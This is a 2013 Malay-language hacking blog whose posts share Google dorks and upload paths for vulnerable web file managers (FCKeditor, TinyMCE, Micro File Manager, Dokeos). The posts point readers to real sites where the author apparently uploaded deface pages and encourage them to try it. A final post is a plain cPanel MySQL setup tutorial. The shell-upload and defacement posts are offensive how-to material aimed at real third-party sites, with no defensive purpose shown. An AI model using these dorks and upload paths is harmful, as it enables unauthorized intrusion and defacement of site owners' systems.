KidX3ll: June 2013

Sunday, 2 June 2013

Micro File Manager Shell Upload Vulnerability

Assalamualaikum :D

kawan, kawan ! aku nak share lagi :D

skedar hilangkan boring je nih okaylh... kita teruskan saja :D hhe

Quote:Dork : inurl:"/mfm.php"

cari target dulu d google.

Dah Jumpe upload la html korang :D

Ok la..jgn lupa cuba :D

Sekadar Berbagi

Shell Upload "template.php?component=" Thailand Website

Assalamualaikum :D

kawan, kawan ! aku nak share lagi :D

skedar hilangkan boring je nih

okaylh... kita teruskan saja :D hhe

Quote:

Dork: inurl:mdbtemplate/mytemplate ---> use your skill

cari target dulu d google.

POC: http://localhost/e-diary/makehtml/fileupload.php

ni contoh:http://www.old.crcn.in.th/site_data/crcn_www/MyOffice/images/deepz.html

Ok la..jgn lupa cuba :D

Sekadar Berbagi

Single attacker crew

CMS Webconstructor Vulnerability

Assalamualaikum :D

kawan, kawan ! aku nak share lagi :D

skedar hilangkan boring je nih

okaylh... kita teruskan saja :D hhe

Quote:Dork:intext:CMS: webconstructor.pl

Cari target dulu d google

Poc: http://[localhost]/PATCH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

ni contoh: http://rofel.pl/upload/deepz.html

Ok la..jgn lupa cuba :D

Sekadar Berbagi

Single attacker crew

Jscript [Upload Files]

Assalamualaikum :D

kawan, kawan ! aku nak share lagi :D

skadar hilangkan boring je nih

okaylh... kita teruskan saja :D hhe

Quote:

Dork:inurl:/jscripts/FCKeditor/editor/

Cari target dulu d google,

Poc:

http://localhost/patch/jscripts/FCKeditor/editor/filemanager/upload/test.html

ni contoh: http://vaacgroup.edu.vn///vantindat/images/deepz.html

Ok la..jgn lupa cuba :D

Sekadar Berbagi

SINGLE ATTACKER CREW

"Portail Dokeos" deface and Shell Upload vulnerability

Assalamualaikum :D

kawan, kawan ! aku nak share lagi :D

skedar hilangkan boring je nih okaylh... kita teruskan saja :D hhe

Quote:Dork : "Portail Dokeos 1.8.5"

cari target dulu d google.

Poc:http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

contoh: http://my.eurasiam.com/main/upload/fack.html

Ok la..jgn lupa cuba :D

Sekadar Berbagi

CREDIT : SINGLE ATTACKER CREW

Saturday, 1 June 2013

CREATE DATABASE

1. login cpanel.. cari mySql database

2. pergi kt create new database(utk name database)..

letak name pape utk database korang

3. contoh ak wt..

da siap database name korang kene create mySql user plak

letak je username pape..

same dengan name mule2 korang buat td pn xpe..

dan letak password korang..

dah buat semua korang klik create user

ok. user da siap.. sekarang korang kene add user plak

klik go back

tgk gmba kt atas..

dekat user korang pilih user korang buat dekat MySql user td..

database korang plih database name korang mule2 tadi..

dan klik add,lepas klik add akan keluar macam nie..

korang tick all privilages klik make changes

siap

nk tau korang buat betul ke x tgk mcm nie.

kat kotak pertama database name.

korang ke-3 mysql user..

KidX3ll

Top Read

Sunday, 2 June 2013

Micro File Manager Shell Upload Vulnerability

Shell Upload "template.php?component=" Thailand Website

CMS Webconstructor Vulnerability

Jscript [Upload Files]

"Portail Dokeos" deface and Shell Upload vulnerability

Saturday, 1 June 2013

CREATE DATABASE

Recent Posts

About Me

PAGEVIEWS

OFFICIAL MEMBER

LINK EXCHANGE

Blog archive

IKLAN